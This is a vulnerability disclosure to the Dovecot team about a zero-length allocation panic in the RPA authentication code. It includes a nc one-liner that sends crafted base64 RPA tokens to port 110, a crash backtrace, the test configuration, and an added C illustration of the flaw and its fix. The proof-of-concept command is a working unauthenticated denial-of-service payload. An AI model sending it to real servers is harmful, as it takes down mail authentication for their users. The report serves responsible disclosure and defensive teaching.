CVSS3: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS2: 5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:P
Hi, Dovecot security team.
I am Orange from the DEVCORE security team. We just did a little security audit on the authentication mechanism of Dovecot, and found a buffer over-read in the RPA implementation.
In mech-rpa.c, the function rpa_read_buffer doesn't check that the length could be zero, and passes the zero into p_malloc(...). It reaches i_panic due to the safety check, and raises SIGABRT to exit the whole dovecot/auth process.
PoC:
$ ps -ao pid,cmd | grep dovecot/auth
25312 dovecot/auth
$ (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
+OK Dovecot ready.
+
+ YEkGCWCGSAGG+HMBAQMAIGQRQj/rSuEgBcOqNgYJRgZIbKOIvMFtVmW+dFdYtrc1YWZjNTcxYWQ1ZTNlMTcAC3BvcDNAdWJ1bnR1
-ERR [AUTH] Authentication failed.
+OK Logging out
$ ps -ao pid,cmd | grep dovecot/auth
25467 dovecot/auth
Stack traces:
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fc8079 in __kernel_vsyscall ()
gdb-peda$ bt
#0 0xf7fc8079 in __kernel_vsyscall ()
#1 0xf7bcd832 in raise () from /lib/i386-linux-gnu/libc.so.6
#2 0xf7bcecc1 in abort () from /lib/i386-linux-gnu/libc.so.6
#3 0xf7eb7656 in default_fatal_finish (status=0x0, type=LOG_TYPE_PANIC) at failures.c:459
#4 fatal_handler_real (ctx=ctx@entry=0xffb550e4, format=format@entry=0x5666baf7 "Trying to allocate %u bytes",
args=args@entry=0xffb55114 "") at failures.c:471
#5 0xf7eb77b4 in i_internal_fatal_handler (ctx=0xffb550e4, format=0x5666baf7 "Trying to allocate %u bytes",
args=0xffb55114 "") at failures.c:848
#6 0xf7df6499 in i_panic (format=0x5666baf7 "Trying to allocate %u bytes") at failures.c:523
#7 0x5664e236 in p_malloc (size=<optimized out>, pool=<optimized out>) at ../../src/lib/mempool.h:105
#8 rpa_read_buffer (buffer=<optimized out>, end=<optimized out>, data=<optimized out>, pool=<optimized out>)
at mech-rpa.c:230
#9 rpa_parse_token3 (error=0xffb55140, data_size=<optimized out>, data=<optimized out>, request=<optimized out>)
at mech-rpa.c:283
#10 mech_rpa_auth_phase2 (data_size=<optimized out>, data=<optimized out>, auth_request=<optimized out>)
at mech-rpa.c:504
#11 mech_rpa_auth_continue (auth_request=<optimized out>, data=<optimized out>, data_size=<optimized out>)
at mech-rpa.c:543
#12 0x56641a91 in auth_request_handler_auth_continue (handler=<optimized out>, args=<optimized out>)
at auth-request-handler.c:696
#13 0x56632812 in auth_client_handle_line (line=0x5839b106 "CONT\t1\tYBEGCWCGSAGG+HMBAQADQUBBAA==",
conn=<optimized out>) at auth-client-connection.c:228
#14 auth_client_input (conn=<optimized out>) at auth-client-connection.c:311
#15 0xf7ed4ddb in io_loop_call_io (io=0x5839d640) at ioloop.c:713
#16 0xf7ed6e5e in io_loop_handler_run_internal (ioloop=0x583879f0) at ioloop-epoll.c:222
#17 0xf7ed4ed2 in io_loop_handler_run (ioloop=0x583879f0) at ioloop.c:765
#18 0xf7ed5139 in io_loop_run (ioloop=0x583879f0) at ioloop.c:738
#19 0xf7e2d0a5 in master_service_run (service=0x58387920, callback=0x566303b0 <client_connected>)
at master-service.c:809
#20 0x5662ff70 in main (argc=<optimized out>, argv=<optimized out>) at main.c:395
#21 0xf7bb8e81 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#22 0x566301a1 in _start ()
We have tested this bug on Dovecot-Core 2.3.10, and our configuration is:
# 2.3.10 (): dovecot.conf
# OS: Linux 4.15.0-96-generic x86_64 Ubuntu 18.04.1 LTS
# Hostname: ubuntu
auth_mechanisms = plain login rpa
default_internal_user = orange
default_login_user = orange
namespace inbox {
inbox = yes
location =
mailbox Drafts {
special_use = \Drafts
}
mailbox Junk {
special_use = \Junk
}
mailbox Sent {
special_use = \Sent
}
mailbox "Sent Messages" {
special_use = \Sent
}
mailbox Trash {
special_use = \Trash
}
prefix =
}
passdb {
driver = shadow
}
userdb {
driver = passwd
}
Denial-of-Service. Please note the crash happens before the authentication process, which means an attacker can crash the REMOTE Dovecot server without a password.
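The failure mode in the report is a length-prefixed parser that validates the body fits the input but never asks whether the length itself is zero, so attacker-controlled input reaches an allocator whose invariant (no zero-byte requests) is enforced by a fatal panic. The following C program is an added illustration of that bug class and its fix; it is not Dovecot's rpa_read_buffer and not the reporter's code. The token layout (one length byte, then the body), the pool_alloc stand-in that returns NULL where Dovecot's p_malloc would panic, and both sample inputs are assumptions constructed for the example. The same reader runs in a weak mode and a hardened mode so the one missing check can be seen side by side.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Counters that make the allocator's behaviour observable from a test. */
static unsigned int alloc_requests, zero_byte_requests;

static void reset_alloc_stats(void) { alloc_requests = 0; zero_byte_requests = 0; }
static unsigned int alloc_request_count(void) { return alloc_requests; }
static unsigned int zero_byte_alloc_requests(void) { return zero_byte_requests; }

/* Hypothetical stand-in for a pool allocator that refuses zero-byte requests.
 * It models only the safety check the report describes: in Dovecot, p_malloc()
 * reaches i_panic() here and the whole auth process aborts; this stand-in
 * returns NULL instead so the effect can be observed without a crash. */
static unsigned char *pool_alloc(size_t size)
{
    alloc_requests++;
    if (size == 0) {
        zero_byte_requests++;
        return NULL;
    }
    return malloc(size);
}

enum { TOKEN_PANIC = -1, TOKEN_MALFORMED = 0, TOKEN_OK = 1 };

/* Reads one length-prefixed token (one length byte, then the body) from
 * [*data, end). With reject_empty == 0 it behaves like the weak reader the
 * report describes: it checks that the body fits but never asks whether the
 * length is zero, so an empty token goes straight to the allocator. With
 * reject_empty != 0 the empty token is refused before any allocation.
 * Illustration of the bug class, not Dovecot's own rpa_read_buffer(). */
static int read_token(const unsigned char **data, const unsigned char *end,
                      unsigned char **out, size_t *out_len, int reject_empty)
{
    const unsigned char *p = *data;
    size_t len;
    unsigned char *buf;

    if (p >= end)
        return TOKEN_MALFORMED;            /* no room for the length byte */
    len = *p++;
    if (reject_empty && len == 0)
        return TOKEN_MALFORMED;            /* the check the weak reader lacks */
    if ((size_t)(end - p) < len)
        return TOKEN_MALFORMED;            /* body would run past the input */

    buf = pool_alloc(len);                 /* weak path: len may be 0 here */
    if (buf == NULL)
        return TOKEN_PANIC;
    memcpy(buf, p, len);
    *out = buf;
    *out_len = len;
    *data = p + len;
    return TOKEN_OK;
}

/* Runs the reader over a whole token stream and returns the status of the
 * last read; a well-formed stream ends in TOKEN_OK. */
static int parse_stream(const unsigned char *buf, size_t n, int reject_empty)
{
    const unsigned char *p = buf, *end = buf + n;
    int status = TOKEN_MALFORMED;

    reset_alloc_stats();
    while (p < end) {
        unsigned char *tok;
        size_t len;
        status = read_token(&p, end, &tok, &len, reject_empty);
        if (status != TOKEN_OK)
            break;
        free(tok);
    }
    return status;
}

/* Constructed samples. GOOD_TOKEN is a 3-byte token; EMPTY_TOKEN is a lone
 * zero length byte, i.e. the shape that drives the allocator to zero. */
static const unsigned char GOOD_TOKEN[]  = { 0x03, 'A', '@', 'A' };
static const unsigned char EMPTY_TOKEN[] = { 0x00 };

static int weak_on_good(void)      { return parse_stream(GOOD_TOKEN, sizeof GOOD_TOKEN, 0); }
static int weak_on_empty(void)     { return parse_stream(EMPTY_TOKEN, sizeof EMPTY_TOKEN, 0); }
static int hardened_on_good(void)  { return parse_stream(GOOD_TOKEN, sizeof GOOD_TOKEN, 1); }
static int hardened_on_empty(void) { return parse_stream(EMPTY_TOKEN, sizeof EMPTY_TOKEN, 1); }

int main(void)
{
    int st;
    st = weak_on_good();
    printf("weak,     good token:  status %d\n", st);
    st = weak_on_empty();
    printf("weak,     empty token: status %d, zero-byte allocs %u\n", st, zero_byte_alloc_requests());
    st = hardened_on_good();
    printf("hardened, good token:  status %d\n", st);
    st = hardened_on_empty();
    printf("hardened, empty token: status %d, allocs %u\n", st, alloc_request_count());
    return 0;
}
```

The design point is where the check sits: a malformed-input decision belongs in the parser, which can fail the request and keep the process alive, not in the allocator, whose only option is to abort. In the hardened mode an empty token is rejected with zero allocator calls, so the unauthenticated client gets an error rather than taking down the shared auth process.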